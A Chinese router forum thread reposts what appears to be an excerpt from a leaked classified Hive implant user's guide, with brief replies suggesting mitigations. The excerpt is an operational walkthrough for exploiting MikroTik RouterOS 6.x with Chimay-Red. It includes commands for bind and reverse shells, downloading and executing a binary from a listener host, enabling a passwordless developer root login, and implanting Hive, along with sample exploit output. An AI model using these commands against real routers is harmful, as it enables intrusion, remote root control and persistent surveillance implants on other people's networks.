找回密码
 注册

QQ登录

只需一步,快速开始

搜索
查看: 12958|回复: 5

[hack] ros并不安全,Installing Hive on MikroTik MIPS RouterOS 6.x

[复制链接]
发表于 2017-12-23 09:18:28 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?注册

×

hacked.JPG

Installing Hive on MikroTik MIPS routeros 6.x using
Chimay-Red
(S) MikroTik routers running version 6.x of RouterOS may be exploited using Chimay-Red. Examples
here use Chimay-Red version 4.7.1.
7.1.1 (S) Chimay Red Command Synopsis
chimay_red.py [-h] -t TARGET [-V] [-a ARCH] <command>
Options:
-h, --help show this help message and exit
-t TARGET, --target
TARGET
Target machine address as <IPORT>
-V, --verbose Verbose mode, print out debug and error
messages
-a ARCH, --arch ARCH Specify architecture (mipsbe, ppc, x86, tile)
Available commands are as follows:
Command Function
bindshell create a bindshell
connectback create a reverse shell
download_and_exe connect back and download a file to then execute
ssl_download_and_exe connect back and download a file via SSL to then
execute
write_devel write "devel-login" file to allow developer account login
write_devel_read_userfi
le
in additon to enabling developer logins, read back the
users file
custom custom shellcode
EXAMPLES
python chimay_red.py -V -t 192.168.88.1:80 bindshell -p 4242
python chimay_red.py -a ppc -t 192.168.88.1:80 connectback -l 192.168.88.2 -p 4242
SECRET//NOFORN//20401109 23
SECRET//NOFORN
(U) Appendix A: Operational Notes (U) Hive 2.9.1 User's Guide
python chimay_red.py -t 192.168.88.1:80 download_and_exe -l 192.168.88.2 -p 4242 -f /tmp/file.elf
python chimay_red.py -t 192.168.88.1:80 ssl_download_and_exe -l 192.168.88.2 -p 4242 -f
/tmp/file.elf
7.1.2 (S) Obtaining Shell Access
(S) To obtain shell access to the router, direct Chimay-Red to an open port on the target address
(typically port 80, which is used for the admin GUI) using the write_devel command having the
following syntax:
python chimay_red.py t
<router address>:<open port> write_devel
(S) Example:
python chimay_red.py t
192.168.88.1:80 write_devel
(S) Use telnet to access the device using the target address. At the login prompt enter devel,
followed by an empty line for the password (i.e. no password). You should receive a BusyBox banner
followed by the root prompt (#).
7.1.3 (S) Implanting Hive
(S) To implant Hive into the router, use download_and_exe_server.py found in the Chimay-Red tools
directory as a download server using the following syntax.
python download_and_exe_server.py l
<command/control address> \
p
<listen port> f
<path to Hive binary>
(S) The command/control address is the host from which the target will obtain the Hive binary after
connecting to the associated listening port.
(S) Example:
python download_and_exe_server.py l
10.6.5.200 p
2000 \
f
~/hive/server/hivedmikrotikmipsPATCHED
(S) Once the server is listening, execute Chimay-Red using the following syntax.
python chimay_red.py t
<target address>:<port> download_and_exe \
l
<listen address> p
<listen port> f
<filename path on the target>
(S) If all goes well, Chimay-Red will provide an indication of what it's doing and then ask you to
press ENTER to start the download of Hive. See the example below.
24 SECRET//NOFORN//20401109
$ python ./chimay_red.py t
10.6.5.71:80 download_and_exe \
l
10.6.5.200 p
10000 f
/tmp/hivedmikrotikmipsPATCHED
[+] Connecting to: 10.6.5.71:80
[+] Detected Routeros: 6.13
[+] Detected architecture: mipsbe
Start download_and_exe server on 10.6.5.200:2000, then press ENTER...
[+] 0 seconds until Web server is reset.
[+] Web server reset.
[+] Connecting to target...
[+] Connected.
[+] Sending exploit payload...
[+] Exploit sent.
$
SECRET//NOFORN
(U) Hive 2.9.1 User's Guide (U) Appendix A: Operational Notes
(S) For additional information, please refer to the documentation provided with Chimay-Red.
SECRET//

routeros
发表于 2017-12-23 11:01:58 | 显示全部楼层
192.168.88.1:80
好了,大家关闭80端口服务,收工
routeros
回复

使用道具 举报

发表于 2017-12-23 12:26:05 | 显示全部楼层
尽快升级新版本
routeros
回复

使用道具 举报

发表于 2017-12-23 13:03:22 | 显示全部楼层
本帖最后由 xuxi3201 于 2017-12-23 13:45 编辑

ros自带防火墙 , 只要你水平高,可以写出任何语句,
初级水平:限制指定ip登录ros的管理端口;
中级水平:限制暴力破解密码;
更高水平:丢弃攻击的数据包;
routeros
回复

使用道具 举报

 楼主| 发表于 2017-12-23 16:07:10 | 显示全部楼层
http://www.freebuf.com/news/132067.html原文出处 这个官方不处理估计关80端口和防火墙没有用。
routeros
回复

使用道具 举报

发表于 2017-12-30 02:44:03 | 显示全部楼层
02/02/2015 Release 2.8 TDR
03/03/2015 Release 2.8.1 TDR
07/15/2015 Release 2.9 TDR
11/09/2015 Release 2.9.1 TDR
两年前就已经开始的事情
routeros
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|软路由 ( 渝ICP备15001194号-1|渝公网安备 50011602500124号 )

GMT+8, 2024-3-29 09:12 , Processed in 0.070184 second(s), 5 queries , Gzip On, Redis On.

Powered by Discuz! X3.5 Licensed

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表